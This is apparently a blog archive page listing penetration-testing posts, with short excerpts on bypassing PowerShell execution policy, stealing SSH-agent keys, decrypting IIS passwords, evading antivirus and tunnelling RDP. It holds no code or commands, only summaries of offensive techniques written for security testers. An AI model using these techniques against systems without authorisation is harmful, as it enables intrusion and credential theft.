15 Ways to Bypass the PowerShell Execution Policy

Scott Sutherland
September 9th, 2014

15 Ways to Bypass the PowerShell Execution Policy

By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn’t have to be. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I’m sure […]

Kevin Burns
July 21st, 2014

Stealing unencrypted SSH-agent keys from memory

If you've ever used SSH keys to manage multiple machines, then chances are you've used SSH-agent. This tool is designed to keep a SSH key in memory so that the user doesn't have to type their passphrase in every time. However, this can create some security risk. A user running as root may have the […]

Ryan Gandrud
June 16th, 2014

15 Ways to Download a File

Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, […]

Scott Sutherland
April 28th, 2014

Decrypting IIS Passwords to Break Out of the DMZ: Part 2

In my last blog I showed how to use native Windows tools to break out of DMZ networks by decrypting database connection strings in IIS web.config files, and using them to pivot through SQL Servers. If you’re interested it can be found at Decrypting IIS Passwords to Break Out of the DMZ: Part 1. In […]

Scott Sutherland
February 10th, 2014

Decrypting IIS Passwords to Break Out of the DMZ: Part 1

From the perspective of a penetration tester, it would be nice if every vulnerability provided a direct path to high-value systems on the internal network.  However, the reality is that we aren’t always that lucky, and sometimes we land on an application server in the DMZ network first. In this blog I’ll cover how to use […]

Scott Sutherland
January 16th, 2013

10 Evil User Tricks for Bypassing Anti-Virus

  Introduction Many anti-virus solutions are deployed with weak configurations that provide end users with the ability to quickly disable or work around the product if they wish. As a result, even users without super hacker “skillz” can run malicious executables (intentionally or not) without having to actually modify them in any way to avoid […]

Scott Sutherland
July 16th, 2012

10 Techniques for Blindly Mapping Internal Networks

Introduction Occasionally clients require that all network and system discovery is done completely blind during internal pentests (meaning no IP addresses are provided). I know that a lot of people have been exposed to ping and port scan discovery techniques, but on large networks those methods alone can be pretty time consuming. So in this […]

Scott Sutherland
July 9th, 2012

5 Ways to Find Systems Running Domain Admin Processes

Introduction Migrating to Domain Admin processes is a common way penetration testers are able to impersonate Domain Admin accounts on the network. However, before a pentester can do that, they need to know what systems those processes are running on. In this blog I’ll cover 5 techniques to help you do that. The techniques that […]

Scott Sutherland
June 15th, 2012

How to Access RDP over a Reverse SSH Tunnel

In this blog I’ll be providing instructions for establishing an RDP connection over a reverse SSH tunnel using plink.exe and FreeSSHd. I’ll also show how to do it without having to accept SSH server keys interactively, which can come in handy when pentesting.  The methods outlined can also be used to tunnel other protocols over […]